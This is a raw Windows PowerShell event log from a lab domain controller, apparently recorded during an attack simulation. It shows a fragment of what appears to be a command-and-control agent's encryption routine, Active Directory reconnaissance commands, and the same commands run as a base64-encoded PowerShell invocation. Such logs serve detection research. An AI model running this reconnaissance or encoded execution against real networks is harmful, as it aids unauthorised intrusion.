                }
                else{
                    $Null;
                }
            }
        }
        catch{}
        finally {
            $FromFile.Close()
        }
    }
    function Encrypt-Bytes {
        param($bytes)
        $IV = [byte] 0..255 | Get-Random -count 16
        try {
            $AES=New-Object System.Security.Cryptography.AesCryptoServiceProvider;
        }
        catch {
            $AES=New-Object System.Security.Cryptography.RijndaelManaged;
        }
        $AES.Mode = "CBC";
        $AES.Key = $Encoding.GetBytes($SessionKey);
        $AES.IV = $IV;
        $ciphertext = $IV + ($AES.CreateEncryptor()).TransformFinalBlock($bytes, 0, $bytes.Length);
        $HMAC.Key = $Encoding.GetBytes($SessionKey);
        $ciphertext + $hmac.ComputeHash($ciphe

ScriptBlock ID: 8941c404-6de7-4fa8-837c-06b982a66cac
Path:

06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480199
Keywords=None
Message=Creating Scriptblock text (1 of 1):
get-netdomaintrust; get-netforesttrust; get-addomain; get-adgroupmember; get-domainuser

ScriptBlock ID: 43f888a7-0483-439d-9f1a-6e1bdcbc951d
Path:
06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1480198
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1480197
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 4728 in AppDomain: DefaultAppDomain.
06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1480196
Keywords=None
Message=PowerShell console is starting up
06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480195
Keywords=None
Message=Started invocation of ScriptBlock ID: cc08798f-70d8-4525-9cce-b4613354e7ac
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480194
Keywords=None
Message=Creating Scriptblock text (1 of 1):
Powershell.exe -E ZwBlAHQALQBuAGUAdABkAG8AbQBhAGkAbgB0AHIAdQBzAHQAOwAgAGcAZQB0AC0AbgBlAHQAZgBvAHIAZQBzAHQAdAByAHUAcwB0ADsAIABnAGUAdAAtAGEAZABkAG8AbQBhAGkAbgA7ACAAZwBlAHQALQBhAGQAZwByAG8AdQBwAG0AZQBtAGIAZQByADsAIABnAGUAdAAtAGQAbwBtAGEAaQBuAHUAcwBlAHIA

ScriptBlock ID: cc08798f-70d8-4525-9cce-b4613354e7ac
Path:
06/15/2021 07:49:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480193
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a4ee5a7-ece1-4f0c-86e6-e22a1bdda822
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480311
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a4ee5a7-ece1-4f0c-86e6-e22a1bdda822
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480310
Keywords=None
Message=Completed invocation of ScriptBlock ID: bb7d82a9-1e51-49e5-8716-b7a21a8e2c09
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480309
Keywords=None
Message=Completed invocation of ScriptBlock ID: eda41651-1787-4040-9bcf-8a7b86e8123f
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480308
Keywords=None
Message=Started invocation of ScriptBlock ID: eda41651-1787-4040-9bcf-8a7b86e8123f
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480307
Keywords=None
Message=Started invocation of ScriptBlock ID: bb7d82a9-1e51-49e5-8716-b7a21a8e2c09
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480306
Keywords=None
Message=Creating Scriptblock text (1 of 1):
prompt

ScriptBlock ID: bb7d82a9-1e51-49e5-8716-b7a21a8e2c09
Path:
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480305
Keywords=None
Message=Completed invocation of ScriptBlock ID: bc56cafc-e031-4572-8411-0e90ab9ba42c
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480304
Keywords=None
Message=Started invocation of ScriptBlock ID: bc56cafc-e031-4572-8411-0e90ab9ba42c
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480303
Keywords=None
Message=Completed invocation of ScriptBlock ID: cc08798f-70d8-4525-9cce-b4613354e7ac
Runspace ID: 72d6f928-9403-4135-8c62-b56ada4f0361
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480302
Keywords=None
Message=Completed invocation of ScriptBlock ID: 308f3dbb-cf50-4092-8d0d-dd65d9e35c61
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480301
Keywords=None
Message=Started invocation of ScriptBlock ID: 308f3dbb-cf50-4092-8d0d-dd65d9e35c61
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480300
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: 308f3dbb-cf50-4092-8d0d-dd65d9e35c61
Path:
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480299
Keywords=None
Message=Completed invocation of ScriptBlock ID: 43f888a7-0483-439d-9f1a-6e1bdcbc951d
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480298
Keywords=None
Message=Completed invocation of ScriptBlock ID: eccab9db-d433-45cb-aed5-f3b60812bc34
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480297
Keywords=None
Message=Completed invocation of ScriptBlock ID: de87a201-ca50-441a-b4ab-eaee9df24093
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480296
Keywords=None
Message=Started invocation of ScriptBlock ID: de87a201-ca50-441a-b4ab-eaee9df24093
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480295
Keywords=None
Message=Completed invocation of ScriptBlock ID: dd37da7f-6674-4ccd-8270-88bef5b90f95
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480294
Keywords=None
Message=Started invocation of ScriptBlock ID: dd37da7f-6674-4ccd-8270-88bef5b90f95
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480293
Keywords=None
Message=Completed invocation of ScriptBlock ID: f6f039fa-41fc-4cde-9136-4525af211fd6
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480292
Keywords=None
Message=Completed invocation of ScriptBlock ID: d43844aa-2f00-46fa-b848-0e54a3f862e8
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480291
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5cc2863e-5758-4cef-848c-0f2c7674fae9
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480290
Keywords=None
Message=Started invocation of ScriptBlock ID: 5cc2863e-5758-4cef-848c-0f2c7674fae9
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480289
Keywords=None
Message=Started invocation of ScriptBlock ID: d43844aa-2f00-46fa-b848-0e54a3f862e8
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480288
Keywords=None
Message=Started invocation of ScriptBlock ID: f6f039fa-41fc-4cde-9136-4525af211fd6
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480287
Keywords=None
Message=Started invocation of ScriptBlock ID: eccab9db-d433-45cb-aed5-f3b60812bc34
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480286
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1834f129-12c6-42ae-8515-e1d68f8e7173
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480285
Keywords=None
Message=Started invocation of ScriptBlock ID: 1834f129-12c6-42ae-8515-e1d68f8e7173
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480284
Keywords=None
Message=Completed invocation of ScriptBlock ID: eccab9db-d433-45cb-aed5-f3b60812bc34
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480283
Keywords=None
Message=Completed invocation of ScriptBlock ID: de87a201-ca50-441a-b4ab-eaee9df24093
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480282
Keywords=None
Message=Started invocation of ScriptBlock ID: de87a201-ca50-441a-b4ab-eaee9df24093
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480281
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: de87a201-ca50-441a-b4ab-eaee9df24093
Path:
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480280
Keywords=None
Message=Completed invocation of ScriptBlock ID: dd37da7f-6674-4ccd-8270-88bef5b90f95
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480279
Keywords=None
Message=Started invocation of ScriptBlock ID: dd37da7f-6674-4ccd-8270-88bef5b90f95
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480278
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: dd37da7f-6674-4ccd-8270-88bef5b90f95
Path:
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480277
Keywords=None
Message=Completed invocation of ScriptBlock ID: f6f039fa-41fc-4cde-9136-4525af211fd6
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480276
Keywords=None
Message=Completed invocation of ScriptBlock ID: d43844aa-2f00-46fa-b848-0e54a3f862e8
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480275
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5cc2863e-5758-4cef-848c-0f2c7674fae9
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480274
Keywords=None
Message=Started invocation of ScriptBlock ID: 5cc2863e-5758-4cef-848c-0f2c7674fae9
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480273
Keywords=None
Message=Started invocation of ScriptBlock ID: d43844aa-2f00-46fa-b848-0e54a3f862e8
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480272
Keywords=None
Message=Started invocation of ScriptBlock ID: f6f039fa-41fc-4cde-9136-4525af211fd6
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1480271
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.PSMessageDetails }

ScriptBlock ID: f6f039fa-41fc-4cde-9136-4525af211fd6
Path:
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480270
Keywords=None
Message=Started invocation of ScriptBlock ID: eccab9db-d433-45cb-aed5-f3b60812bc34
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1480269
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1834f129-12c6-42ae-8515-e1d68f8e7173
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1480268
Keywords=None
Message=Started invocation of ScriptBlock ID: 1834f129-12c6-42ae-8515-e1d68f8e7173
Runspace ID: eb15df6a-cb8f-414d-b537-2b34749ddbd2
06/15/2021 07:49:17 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4100
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Executing Pipeline
OpCode=To be used when an exception is raised
RecordNumber=1480267
Keywords=None
Message=Error Message = Cannot find an object with identity: ''' under: 'DC=attackrange,DC=local'.
Fully Qualified Error ID = ActiveDirectoryCmdlet:Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException,Microsoft.ActiveDirectory.Management.Commands.GetADGroupMember


Context:
        Severity = Warning
        Host Name = ConsoleHost
        Host Version = 5.1.14393.4402
        Host ID = d23634a1-fa16-4ec9-8f18-365cacf61399
